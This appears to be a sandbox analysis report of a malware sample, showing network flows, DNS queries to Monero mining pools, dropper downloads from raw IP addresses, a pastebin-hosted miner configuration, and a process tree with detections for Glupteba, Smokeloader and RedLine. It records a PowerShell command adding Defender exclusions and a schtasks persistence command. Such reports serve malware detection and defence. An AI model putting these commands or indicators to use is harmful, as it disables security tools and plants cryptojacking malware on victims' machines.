Jul 24, 2024 14:31:23.610414028 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.622782946 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.622807026 CEST | 443   | 49708 | 104.20.3.235    | 192.168.2.9
Jul 24, 2024 14:31:23.622818947 CEST | 49708 | 443   | 192.168.2.9     | 104.20.3.235
Jul 24, 2024 14:31:23.623986959 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:23.624034882 CEST | 49707 | 14433 | 192.168.2.9     | 51.195.138.197
Jul 24, 2024 14:31:23.712946892 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:23.718189955 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:23.718571901 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:23.791887999 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:23.796747923 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.386137962 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.386374950 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.386476040 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:24.387373924 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:24.392304897 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.587907076 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.703792095 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:24.705553055 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:26.317642927 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:26.406943083 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:33.321934938 CEST | 80    | 49706 | 185.172.128.90  | 192.168.2.9
Jul 24, 2024 14:31:33.322221041 CEST | 49706 | 80    | 192.168.2.9     | 185.172.128.90
Jul 24, 2024 14:31:33.323419094 CEST | 49706 | 80    | 192.168.2.9     | 185.172.128.90
Jul 24, 2024 14:31:33.328346968 CEST | 80    | 49706 | 185.172.128.90  | 192.168.2.9
Jul 24, 2024 14:31:33.338004112 CEST | 49712 | 80    | 192.168.2.9     | 185.172.128.127
Jul 24, 2024 14:31:33.342981100 CEST | 80    | 49712 | 185.172.128.127 | 192.168.2.9
Jul 24, 2024 14:31:33.343085051 CEST | 49712 | 80    | 192.168.2.9     | 185.172.128.127
Jul 24, 2024 14:31:33.343583107 CEST | 49712 | 80    | 192.168.2.9     | 185.172.128.127
Jul 24, 2024 14:31:33.348407030 CEST | 80    | 49712 | 185.172.128.127 | 192.168.2.9
Jul 24, 2024 14:31:36.365993977 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:36.410185099 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:46.407047987 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:46.614857912 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:51.341861963 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:31:51.394615889 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:31:54.729722023 CEST | 80    | 49712 | 185.172.128.127 | 192.168.2.9
Jul 24, 2024 14:31:54.729871035 CEST | 49712 | 80    | 192.168.2.9     | 185.172.128.127
Jul 24, 2024 14:31:54.757251978 CEST | 49712 | 80    | 192.168.2.9     | 185.172.128.127
Jul 24, 2024 14:31:54.762161016 CEST | 80    | 49712 | 185.172.128.127 | 192.168.2.9
Jul 24, 2024 14:31:54.770476103 CEST | 49713 | 80    | 192.168.2.9     | 185.172.128.109
Jul 24, 2024 14:31:54.775310040 CEST | 80    | 49713 | 185.172.128.109 | 192.168.2.9
Jul 24, 2024 14:31:54.775379896 CEST | 49713 | 80    | 192.168.2.9     | 185.172.128.109
Jul 24, 2024 14:31:54.775480032 CEST | 49713 | 80    | 192.168.2.9     | 185.172.128.109
Jul 24, 2024 14:31:54.781382084 CEST | 80    | 49713 | 185.172.128.109 | 192.168.2.9
Jul 24, 2024 14:32:01.402167082 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:01.519591093 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:11.401983976 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:11.519701958 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:16.151645899 CEST | 80    | 49713 | 185.172.128.109 | 192.168.2.9
Jul 24, 2024 14:32:16.155595064 CEST | 49713 | 80    | 192.168.2.9     | 185.172.128.109
Jul 24, 2024 14:32:16.155827045 CEST | 49713 | 80    | 192.168.2.9     | 185.172.128.109
Jul 24, 2024 14:32:16.160765886 CEST | 80    | 49713 | 185.172.128.109 | 192.168.2.9
Jul 24, 2024 14:32:16.172677040 CEST | 49715 | 80    | 192.168.2.9     | 5.42.64.33
Jul 24, 2024 14:32:16.177664995 CEST | 80    | 49715 | 5.42.64.33      | 192.168.2.9
Jul 24, 2024 14:32:16.179595947 CEST | 49715 | 80    | 192.168.2.9     | 5.42.64.33
Jul 24, 2024 14:32:16.179820061 CEST | 49715 | 80    | 192.168.2.9     | 5.42.64.33
Jul 24, 2024 14:32:16.184576035 CEST | 80    | 49715 | 5.42.64.33      | 192.168.2.9
Jul 24, 2024 14:32:21.412606955 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:21.519638062 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:26.358349085 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:26.519701958 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:28.989005089 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:28.993995905 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:29.180012941 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:29.332159042 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:36.451862097 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:36.520056009 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:37.553342104 CEST | 80    | 49715 | 5.42.64.33      | 192.168.2.9
Jul 24, 2024 14:32:37.553474903 CEST | 49715 | 80    | 192.168.2.9     | 5.42.64.33
Jul 24, 2024 14:32:37.553546906 CEST | 49715 | 80    | 192.168.2.9     | 5.42.64.33
Jul 24, 2024 14:32:37.558692932 CEST | 80    | 49715 | 5.42.64.33      | 192.168.2.9
Jul 24, 2024 14:32:46.552565098 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:46.644814014 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:32:56.476118088 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:32:56.519655943 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:06.473804951 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:06.644293070 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:16.445543051 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:16.519750118 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:26.539228916 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:26.644707918 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:36.562424898 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:36.644773006 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:46.585232973 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:46.629169941 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:33:56.618942022 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:33:56.832254887 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:06.570838928 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:06.629144907 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:16.600047112 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:16.832292080 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:26.692620039 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:26.832324028 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:33.302762032 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:33.519915104 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:43.277385950 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:43.332356930 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:34:53.296309948 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
Jul 24, 2024 14:34:53.426120996 CEST | 49709 | 14433 | 192.168.2.9     | 51.15.58.224
Jul 24, 2024 14:35:03.438327074 CEST | 14433 | 49709 | 51.15.58.224    | 192.168.2.9
                                                                                          Jul 24, 2024 14:35:03.519895077 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:13.347867966 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:13.520148039 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:14.486427069 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:14.487775087 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:14.491117954 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:14.491653919 CEST4970914433192.168.2.951.15.58.224
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 24, 2024 14:31:21.240500927 CEST | 52964 | 53 | 192.168.2.9 | 1.1.1.1
Jul 24, 2024 14:31:21.254791975 CEST | 53 | 52964 | 1.1.1.1 | 192.168.2.9
Jul 24, 2024 14:31:22.641868114 CEST | 64500 | 53 | 192.168.2.9 | 1.1.1.1
Jul 24, 2024 14:31:22.651048899 CEST | 53 | 64500 | 1.1.1.1 | 192.168.2.9
Jul 24, 2024 14:31:23.656443119 CEST | 63265 | 53 | 192.168.2.9 | 1.1.1.1
Jul 24, 2024 14:31:23.664674044 CEST | 53 | 63265 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 24, 2024 14:31:21.240500927 CEST | 192.168.2.9 | 1.1.1.1 | 0xdfe2 | Standard query (0) | xmr-eu2.nanopool.org | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:22.641868114 CEST | 192.168.2.9 | 1.1.1.1 | 0x7961 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.656443119 CEST | 192.168.2.9 | 1.1.1.1 | 0x49c5 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.68.137.186 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.195.43.17 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 163.172.171.111 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.210.150.92 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.15.61.114 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.195.138.197 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:21.254791975 CEST | 1.1.1.1 | 192.168.2.9 | 0xdfe2 | No error (0) | xmr-eu2.nanopool.org | | 51.15.89.13 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:22.651048899 CEST | 1.1.1.1 | 192.168.2.9 | 0x7961 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:22.651048899 CEST | 1.1.1.1 | 192.168.2.9 | 0x7961 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:22.651048899 CEST | 1.1.1.1 | 192.168.2.9 | 0x7961 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:31:23.664674044 CEST | 1.1.1.1 | 192.168.2.9 | 0x49c5 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
                                                                                          • pastebin.com
                                                                                          • 185.172.128.90
                                                                                          • 185.172.128.127
                                                                                          • 185.172.128.109
                                                                                          • 5.42.64.33
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 185.172.128.90 | 80 | 7712 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
Jul 24, 2024 14:31:11.860862970 CEST | 152 | OUT | GET /cpa/ping.php?substr=four&s=ab HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.90
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 185.172.128.127 | 80 | 7712 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
Jul 24, 2024 14:31:33.343583107 CEST | 135 | OUT | GET /syncUpd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.127
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49713 | 185.172.128.109 | 80 | 7712 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
Jul 24, 2024 14:31:54.775480032 CEST | 135 | OUT | GET /syncUpd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 185.172.128.109
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49715 | 5.42.64.33 | 80 | 7712 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
Jul 24, 2024 14:32:16.179820061 CEST | 139 | OUT | GET /ping.php?substr=four HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 5.42.64.33
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49708 | 104.20.3.235 | 443 | 2836 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-24 12:31:23 UTC | 114 | OUT | GET /raw/2HQ8Rbid HTTP/1.1
Accept: */*
Connection: close
Host: pastebin.com
User-Agent: cpp-httplib/0.12.6
2024-07-24 12:31:23 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Jul 2024 12:31:23 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Tue, 23 Jul 2024 14:37:34 GMT
Server: cloudflare
CF-RAY: 8a83ed4ae895176c-EWR
2024-07-24 12:31:23 UTC | 670 | IN | Data Raw: 32 39 37 0d 0a 7b 0d 0a 09 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 09 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 09 22 70 6f 72 74 22 3a 20 31 34 34 33 33 2c 0d 0a 09 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 53 43 46 42 51 44 59 68 6a 6a 59 41 46 50 76 56 34 77 72 68 39 47 32 4a 73 63 73 6b 6b 72 73 35 70 6f 67 39 66 66 58 70 68 35 33 37 4c 48 43 72 69 6f 39 36 66 38 65 56 48 45 66 44 52 4d 56 41 51 41 51 65 61 54 4a 38 79 4d 79 4e 51 39 58 48 6b 74 41 63 78 5a 48 59 53 4c 4c 64 70 2e 66 6f 75 72 74 68 58 2f 70 61 73 73 77 6f 72 64 22 2c 0d 0a 09 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 09 22 72 69 67 2d 69 64 22 3a 20 22 22 2c 0d 0a 09 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 66 61
Data Ascii: 297{"algo": "rx/0","pool": "xmr-eu1.nanopool.org","port": 14433,"wallet": "46SCFBQDYhjjYAFPvV4wrh9G2Jscskkrs5pog9ffXph537LHCrio96f8eVHEfDRMVAQAQeaTJ8yMyNQ9XHktAcxZHYSLLdp.fourthX/password","password": "","rig-id": "","keepalive": fa
2024-07-24 12:31:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                          Target ID:0
                                                                                          Start time:08:31:07
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\Desktop\25C1.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\25C1.exe"
                                                                                          Imagebase:0x520000
                                                                                          File size:9'104'384 bytes
                                                                                          MD5 hash:CEAE65EE17FF158877706EDFE2171501
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:4'315'536 bytes
                                                                                          MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 88%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:2'123'218 bytes
                                                                                          MD5 hash:28B72E7425D6D224C060D3CF439C668C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 88%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                          Imagebase:0x7ff69a530000
                                                                                          File size:2'654'720 bytes
                                                                                          MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 91%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:4'979'200 bytes
                                                                                          MD5 hash:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:Borland Delphi
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1369842650.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 75%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:08:31:09
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                          Imagebase:0x7ff760310000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:08:31:09
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                          Imagebase:0xc50000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff70f010000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:chcp 1251
                                                                                          Imagebase:0x690000
                                                                                          File size:12'800 bytes
                                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:08:31:12
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                                          Imagebase:0xeb0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
